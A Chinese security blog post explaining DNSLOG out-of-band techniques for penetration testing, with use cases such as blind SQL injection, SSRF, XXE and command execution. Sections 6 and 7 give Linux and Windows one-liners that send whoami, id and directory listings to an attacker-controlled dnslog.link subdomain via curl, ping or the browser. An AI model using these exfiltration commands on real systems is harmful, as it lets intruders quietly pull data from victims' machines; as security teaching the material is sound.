• 欢迎访问挑战自我博客网站,安全研究,web渗透,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入挑战自我博客网站 网站主页

DNSLOG使用技巧

tool 挑战自我 3166次浏览 已收录 0个评论

1、文章简介

本文主要介绍渗透测试中DNSLOG中的一些使用技巧,最开始接触这类工具的就是cloudeye,记得那会乌云还在,是需要乌云币还是邀请码我忘记了。
再后面,我接触了bugscan,发现里面有一个开源的dnslog,原理基本类似,功能都挺全的,但是在线版的需要到bugscan网站的2级会员权限,然后本人就是努力提交bugscan的插件,把bugscan网站设置为主页,每天登陆获取积分,好不容易才熬到的2级会员(好像是60积分的样子),虽然现在bugscan的扫描不能使用了,但是我还是非常感谢四叶草这个团队的,他算是我刚入门的一个行业导师,从那些插件中我学习到了很多东西!

2、DNSLOG开源工具代码

首先,DNSLOG工具,bugscan已经公布在了github上,地址如下:

https://github.com/BugScanTeam/DNSLog

3、在线网站地址

http://cloudeye.me/
http://admin.dnslog.link/

4、应用场景

在渗透测试中,经常会遇到如下场景:

1、sql注入不能回显
2、blind类型的ssrf以及xxe漏洞
3、无回显的命令执行漏洞
……

5、基本实现原理

DNS在解析的时候会留下日志,这类工具就是读取多级域名的解析日志,来获取信息,简单来说就是把信息放在多级子域名中,传递到我们自己的服务器中,然后读取日志,获取特定信息,最后根据获取的信息来判断我们渗透测试的动作是否成功运行。

6、linux系统中dnslog渗透测试技巧

curl http://xxx.dnslog.link/`whoami`

ping -c 1 `whoami`.xxx.dnslog.link
 
如果碰到内容有空格(换行符等),就会截断,只输出前面的,这时候可以利用编码来输出,但有输出字符数最大限制;
curl http://xxx.dnslog.link/$(id|base64)
curl http://xxx.dnslog.link/`id|base64`

编码base64之后,还有换行符的,可以把字符串中的 '\n'换成其他字符,如 '-':
curl http://xxx.dnslog.link/$(id|base64|tr '\n' '-')
curl http://xxx.dnslog.link/`id|base64|tr '\n' '-'`
 
碰到ls这类多个输出的命令,直接使用脚本;
for i in $(ls /);do curl "http://$i.xxx.dnslog.link/";done;

7、windows系统中dnslog渗透测试技巧

利用HTTP请求将结果使用默认浏览器弹出:

for /F %x in ('whoami') do start http://xxx.dnslog.link/%x

利用DNS请求获取计算机名、用户名:

获取计算机名:for /F "delims=\" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link
获取用户名:for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link

探测目录文件列表,由于dir有/b参数,不显示修改日期等信息,只显示文件名,所以可以弹出:

for /F %x in ('dir /b C:\') do start http://xxx.dnslog.link/[%x].jpg

挑战自我博客, 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明DNSLOG使用技巧
喜欢 (11)
支付宝[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址